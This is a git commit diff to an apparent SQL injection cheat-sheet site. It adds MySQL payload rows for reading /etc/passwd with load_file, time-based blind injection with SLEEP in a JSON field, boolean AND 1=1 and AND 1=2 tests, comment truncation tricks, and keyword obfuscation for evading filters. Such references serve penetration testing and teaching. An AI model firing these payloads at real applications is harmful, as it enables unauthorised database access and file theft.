Update mysql (#16)

JacobReynolds · 0xvu1n · web-flow · commit aedab7ce869b · 2022-11-15T09:04:25.000-06:00
* Added traversing directories

* Update mysql

Co-authored-by: vu1n &lt;chintankdesai07@gmail.com&gt;
diff --git a/attackQueries/executingOSCommands/mysql.html b/attackQueries/executingOSCommands/mysql.html
@@ -18,6 +18,9 @@ <h3 id="executing-os-commands">Executing OS Commands Through MySQL</h3>
             <td>Command Execution with MySQL CLI Access</td>
             <td><a rel="noopener" target="_blank" href="https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/">https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/</a></td>
         </tr>
+        <tr>
+            <td>Traversing directories (Linux)</td>
+            <td>SELECT load_file("/etc/passwd") from information_schema</td>
     </tbody>
 </table>
 
diff --git a/injectionTechniques/conditionalStatements/mysql.html b/injectionTechniques/conditionalStatements/mysql.html
@@ -14,9 +14,17 @@ <h3 id="conditionals">Conditionals</h3>
             <td>If/Else</td>
             <td>SELECT IF(1=2,'true','false')</td>
         </tr>
+        <tr>
+            <td>If/Else (json)</td>
+            <td>{"id"="xxx AND IF(length(database())=’1’, SLEEP(15),1)#”}<br/>If the database name's length is 1, database gets unresponsive with given miliseconds</td>
+        </tr>
         <tr>
             <td>Logical OR</td>
             <td>SELECT 1 || 0<br><em>To see nuances of this operator go <a target="_blank" rel="noopener" href="https://dev.mysql.com/doc/refman/5.7/en/logical-operators.html#operator_or">here</a></em></td>
         </tr>
+        <tr>
+            <td>AND (json)</td>
+            <td>{"id"="xxx AND 1=1#"}<br/>True statement<br/>{"id"="xxx AND 1=2#"}<br/>False statement</td>
+        </tr>
     </tbody>
-</table>
+</table>
diff --git a/injectionTechniques/obfuscation/mysql.html b/injectionTechniques/obfuscation/mysql.html
@@ -26,6 +26,10 @@ <h3 id="obfuscating-queries">Obfuscating Queries</h3>
             <td>Hex &gt; Int</td>
             <td>SELECT 0x20 + 0x40</td>
         </tr>
+        <tr>
+            <td>Unhex/hex</td>
+            <td>unhex(hex(user()))</td>
+        </tr>
         <tr>
             <td>Bitwise AND</td>
             <td>SELECT 6 &amp; 2</td>
@@ -72,7 +76,11 @@ <h3 id="obfuscating-queries">Obfuscating Queries</h3>
         </tr>
         <tr>
             <td>Single line comment</td>
-            <td>SELECT 1 -- comments out rest of line<br/>SELECT 1 # comments out rest of line</td>
+            <td>SELECT 1 -- comments out rest of line<br/>SELECT 1 # comments out rest of line<br/>SELECT 1 --+ - Comments out rest of the line<br/>SELECT 1 --+- - Comments out rest of the line<br/>SELECT 1 -- - - Comments out rest of the line<br/>SELECT 1 %00 - Comments out rest of the line</td>
+        </tr>
+        <tr>
+            <td>In-line comment</td>
+            <td>SEL/*_*/ECT * FR/*_*/OM</td>
         </tr>
         <tr>
             <td>No Spaces</td>
@@ -94,6 +102,10 @@ <h3 id="obfuscating-queries">Obfuscating Queries</h3>
             <td>Invalid Percent Encode</td>
             <td>%SEL%ECT * F%R%OM U%S%ERS</td>
         </tr>
+        <tr>
+            <td>character obfuscation</td>
+            <td>SeLeCt * FrOm</td>
+        </tr>
     </tbody>
 </table>
 
